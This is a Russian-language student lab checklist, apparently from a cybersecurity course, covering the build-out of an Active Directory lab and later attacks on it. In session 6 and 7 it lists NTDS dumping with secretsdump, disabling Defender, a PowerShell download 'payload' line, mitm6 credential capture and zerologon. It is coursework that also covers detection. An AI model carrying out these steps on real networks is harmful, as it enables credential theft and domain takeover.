Здесь предлагается заскринить основные моменты всех практик, которые были выполнены.
Урванцев Данила CYB-2
Занятие 1
Oracle Virtualbox установлен;
Oracle Virtualbox extentions установлены;
Windows Server 2016 (анлгийская версия) установлен;
Windows Server 2016 (русская версия) установлен;
Windows 10 установлен;
Mikrotik импортирован;
На Mikrotik настроен сетевой адаптер локальной сети;
На Mikrotik настроен NAT.

Занятие 2
Статические адреса настроены на двух WinServer;
Имена компьютеров Winserver и Win10 настроены (dc1, dc2, pc1);
На оба WinServer установлены роли AD, DHCP, DNS;
WinServer en сконфигурирован как основной контроллер домена hackeru.local;

WinServer ru сконфигурирован как второстепенный контроллер домена;

Win10 внесён в домен.


Занятие 3
Применён скрипт newadusergroups.ps1 (созданы OU, пользователи и группы).
По итогу в домене будет такая структура объектов:





Занятие 4
DHCP сервер сконфигурирован на одном из контроллеров домена;

Создана групповая политики расширенного логирования
Политика применена на контроллеры домена.

Занятие 5
Создана сетевая папка на одном из контроллеров домена;
К сетевой папке примены настройки аудита удаления файлов;
От имени любого пользователя, работающего на Win10, проведено удаление вложенных файлов/папок из сетевой папки;
В журнале событий найдены события удаления.

Занятие 6
Проведён бэкап файла NTDS;
Бэкап перекинут на Kali linux;
Просмотрено содержимое файла с помощью secrestdump;

Загружен .exe или .msi файл с Kali Linux на рабочий стол одного из пользователей win10;
Отключал Windows Defender - иначе обнаруживал попытки
Payload: powershell -command "Invoke-WebRequest -Uri 'https://mt.lv/winbox64' -OutFile 'C:\Users\Public\desktop\file.exe'"

Удалось подключиться с Kali по RDP на Win10;

С помощью mitm6 перехвачена аутентификация трёх пользователей домена.



Занятие 7
Проведена атака zerologon;

Просмотрено содержимое файла NTDS удалённо;

Найдены события, подтверждающие факт компрометации домена.
